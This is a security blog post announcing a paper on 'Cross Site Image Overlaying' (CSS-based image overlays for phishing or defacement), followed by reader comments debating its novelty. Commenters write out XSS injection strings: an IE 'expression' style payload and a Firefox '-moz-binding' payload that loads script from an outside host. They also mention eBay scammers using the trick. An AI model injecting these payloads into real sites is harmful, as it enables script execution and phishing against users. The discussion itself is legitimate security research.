XSIO – Cross Site Image Overlaying

I finished this paper about one month ago but I had to clarify some stuff with my employer Dreamlab Technologies Ltd. Now everything’s clear and I can publish my paper about an attack type I call XSIO – Cross Site Image Overlaying. It’s about something which I think many of you have already done but I wasn’t able to find something written about it and even I don’t think, that most of you are aware of how big the impact of something like this could be. But just read the paper if you’re interested in hear some more about it :)

Download – XSIO Paper


16 Comments to “XSIO – Cross Site Image Overlaying”  

  1. 1 Luke Welling

    I am glad somebody has given it a name.

    I have seen eBay scammers playing with this for a while. If you are running an advance fee fraud scam with ebay auctions as bait, you don’t really want people to waste time bidding on the items (that will probably get canceled before running to completion) you just want them to contact you so you can start talking them into sending you payment or a “deposit” or whatever. Therefore, you don’t need a sophisticated XSIO setup, just a big screen sized one with a mailto.

    If ebay is still vulnerable, then you could run a more sophisticated one and make a fairly convincing phishing attack fairly easily, because ebay routinely asks users to reauthenticate during a session.

  2. 2 nEUrOO

    You’re only talking about images but you can use CSS and z buffering to do the same thing with all divs/elements.
    I made a demo long time ago about that (guess it’s the same vulns.). In my case it was a really special stuff, but I guess the philosophy is the same…

    http://rgaucher.info/b/index.php/post/2007/02/23/CSS-is-amphetamine-for-your-XSS-Injection

  3. 3 Disenchant

    Hi nEUrOO,
    yes I remember the blog posting you mention here :)

    I think it’s about the same basic idea of how to do something but not on what to do with it. The possibility to set the position of an element on a website through CSS is nothing special at all because every web developer does this today but you used this for executing client side script code (which is a cool idea by the way). The problem of your idea is, that this will have no effect when a user has Javascript disabled and because of such a situation I was looking for a way of doing stuff like defacements, disinformation or phishing like described in the paper without client side script code.

  4. 4 nEUrOO

    Exactly, this was actually just an example on how to use CSS to do cool stuff, I really should dive into that more… CSS is so powerful :)
    I know that Gareth Heyes is also working on that direction…

    Anyway, as Luke said, it’s good that somebody gave that vuln a name :)

  5. 5 sirdarckcat

    If you can modify the style elements of a website, you can do far more dangerous things than overlapping an image.. Come on, if we make “this” a type of attack, we will finish having thousands of bogus attacks based on not dangerous features..
    Maybe you could use an animated gif, for making the user thing he is in another website, but.. any way, this is not dangerous..

  6. 6 Disenchant

    Hi sirdarckcat,
    can you make some examples of “far more dangerous things than overlapping an image” we can do, just using the style attribute?

    Of course you’re right on the point that there are much more things we should then probably give a name to (even if there are not thousands) but from my point of view this is needed. If we know what we’re talking about because of different names, it’s much easier to reference to something like this or also to show people who aren’t security professionals what could be dangerous for them and how to protect against it.

  7. 7 lake2

    yes, it’s good idear

  8. 8 Aks aka 0kn0ck

    hi dis

    The concept is good from perpective of XSS injection through different vectors.
    Since your vector of discussion is very flexible to one point that is XSIO and your
    point is new as peer related layout. Its very good. I will work on this aspect too.
    Its good.Keep it up.Carry on.

  9. 9 kuza55

    @Disenchant:
    I think sirdarckcat meant you could conduct XSS attacks via the style attribute, e.g.
    style=”width: expression(alert(‘XSS’));”
    in IE6/7. admittedly it doesn’t work in FF or Opera, but IE is still the biggest portion of the market, and the portion of the market most likely to get fooled by the attack in your paper.

  10. 10 Disenchant

    Hi kuza55,
    it could be that sirdarckcat means this attack vector but then we’re at the same point I already discussed above with nEUrOO. If you can execute client side script code this is definitely the better way of doing an attack for defacements, disinformation or phishing than with a XSIO but if Javascript is turned off, you need something else than this and the alternative here is a for example a XSIO.

    I would be really interested in an answer of sirdarckcat to hear more about the “far more dangerous things” he mentioned in his comment :)

  11. 11 Daniel

    I really really don’t think this can be classed as any new attack. We initially classed most of the XSS variants (and believe me, there are many) back in the OWASP Testing Guide version 1 which was 4 years ago now.

    What other dangerous methods did you find?

    Daniel
    OWASP

  12. 12 Disenchant

    Hi Daniel,
    please don’t see this as a XSS variant! This is the big difference between XSS und XSIO, the first one needs the possibility to execute client side script code but the second one just needs normal HTML or to be more specific just CSS because of the style attribute.

    And to answer your question, for this only the style attribute is relevant because it’s about using CSS and (AFAIK) no other methods have such possibilities.

  13. 13 Daniel

    This falls into the simple category of input and output validation. There is no new method here, hell i’ve been testing style variants for input since 2001, any application which does not check the correct data being sent, or received, is vulnerable to this style of injection testing.

    Not meaning to sound against you here, but this technique is very very old and yes, you are right, we never did bother calling it anything as it happily fell into the injection suite of issues

    If the application does not check all of the variables, of course you can do simple html references, as the developer has not expected that to happen, so what is new about what you have named it?

    Not a personal attack, just failing to see the “new” factor of something we have been testing for a long time.

  14. 14 Disenchant

    Of course it’s about in- and output validation but for example SQLi is also just about this, so this is nothing we have to talk about from my point of view because it’s not relevant here.

    I agree with you that using the style attribute for attacks is not new at all but I’ve never seen someone doing the things described in the paper through it and also as I already wrote, I wasn’t able to find a paper, blog posting or something on this. The interesting stuff here is not that you can do something evil through the style attribute, it’s about what we can do through it.

    PS: I don’t see your comments on this as a personal attack, it’s very helpful to me when I get feedback on my work. Thanks very much :)

  15. 15 sirdarckcat

    As kuza55 said, I meant to XSS, firefox users are also vulnerable
    STYLE=’-moz-binding:url(“http://ha.ckers.org/xssmoz.xml#xss”)’
    just the 1% that use noscript will be unvlnerable.

  16. 16 Disenchant

    Hi sirdarckcat,
    you’re right, most people will not have Javascript turned of but isn’t it good to know of a way to perform an “attack” also without client side script code? Perhaps a combination of the XSS and the XSIO way would be interesting to catch 100% of all users :)